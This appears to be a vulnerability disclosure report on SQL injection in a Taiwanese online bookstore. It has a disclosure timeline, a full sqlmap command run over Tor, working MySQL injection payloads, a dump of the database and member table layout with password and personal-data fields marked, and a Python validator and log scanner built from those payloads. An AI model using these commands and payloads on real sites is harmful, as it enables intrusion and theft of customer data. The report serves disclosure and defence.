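2015-12-10: Details reported to the vendor; awaiting vendor handling
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-27: Vendor fixed the vulnerability and disclosed it voluntarily; details disclosed to the public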
SQL injection in a Taiwanese bookstore (affects 5,000 users)
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/indexstore.php?product_id=3724" --dbs --is-dba --current-db
---
Parameter: product_id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: product_id=3724 RLIKE (SELECT (CASE WHEN (4957=4957) THEN 3724 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: product_id=3724 AND (SELECT 5470 FROM(SELECT COUNT(*),CONCAT(0x7178707a71,(SELECT (ELT(5470=5470,1))),0x71717a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web application technology: Apache, PHP 5.4.41
back-end DBMS: MySQL 5.0
current database: 'fembooks_utf8'
current user is DBA: False
available databases [2]:
[*] fembooks_utf8
[*] information_schema

Database: fembooks_utf8
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| orders_product | 6992    |
| memberdata     | 5677    |  ===> 5,000 users
| product        | 3824    |
<.....>

Database: fembooks_utf8
Table: memberdata
[22 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| m_activity     | varchar(254)        |
| m_address      | varchar(128)        |  ===> address
| m_company      | varchar(64)         |
| m_country      | varchar(64)         |
| m_email        | varchar(64)         |  ===> email
| m_fax          | varchar(64)         |
| m_id           | int(11) unsigned    |  ===> ID card number?
| m_introduction | varchar(254)        |
| m_invoiceno    | varchar(64)         |
| m_joindate     | date                |
| m_level        | tinyint(2) unsigned |
| m_mobile       | varchar(64)         |  ===> email
| m_noe          | varchar(64)         |
| m_passwd       | varchar(64)         |  ===> password
| m_person       | varchar(64)         |
| m_pid          | varchar(10)         |
| m_president    | varchar(64)         |
| m_sales        | varchar(64)         |
| m_sex          | char(1)             |
| m_tel          | varchar(64)         |
| m_username     | varchar(64)         |  ===> username
| m_web          | varchar(128)        |
+----------------+---------------------+
Filtering
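The filtering fix suggested above, as an added example that is not part of the original report or the vendor's code: an allow-list check that accepts `product_id` only as a plain integer, and a log scan that flags requests failing it and labels them with the two technique types from the sqlmap output. The function names, log format and client addresses are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Allow-list for the numeric product_id parameter: ASCII digits only, bounded length.
VALID_ID = re.compile(r"[0-9]{1,10}")

# Signatures derived from the two payload types in the sqlmap output above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(.*\bGROUP\s+BY\b", re.I | re.S),
}

def parse_product_id(raw):
    """Return product_id as an int, or None when it is not a plain integer."""
    return int(raw) if raw is not None and VALID_ID.fullmatch(raw) else None

def classify(raw):
    """Label a rejected value with the matching technique, else 'malformed'."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(raw):
            return name
    return "malformed"

def scan(log_lines):
    """Return (client, label) for each request whose product_id fails the allow-list."""
    hits = []
    for line in log_lines:
        m = re.match(r'(\S+) .*?"GET (\S+) HTTP', line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs percent-decodes the value before it is checked.
        for raw in parse_qs(urlsplit(target).query).get("product_id", []):
            if parse_product_id(raw) is None:
                hits.append((client, classify(raw)))
    return hits

# Constructed access-log lines (documentation IPs); values 2 and 3 are the payloads quoted above.
VALUES = [
    "3724",
    "3724 RLIKE (SELECT (CASE WHEN (4957=4957) THEN 3724 ELSE 0x28 END))",
    "3724 AND (SELECT 5470 FROM(SELECT COUNT(*),CONCAT(0x7178707a71,(SELECT (ELT(5470=5470,1))),"
    "0x71717a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
    "37x24",
]
SAMPLE_LOG = [
    f'203.0.113.{i} - - [10/Dec/2015:10:00:0{i} +0800] "GET /indexstore.php?product_id={quote(v)} HTTP/1.1" 200 512'
    for i, v in enumerate(VALUES, 1)
]
```

Validation of this kind complements binding the value as a parameter in the SQL statement; it does not replace it.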
Severity: High
Vulnerability Rank: 17
Confirmed: 2015-12-14 17:21
Thanks for the report
2016-01-27: Fixed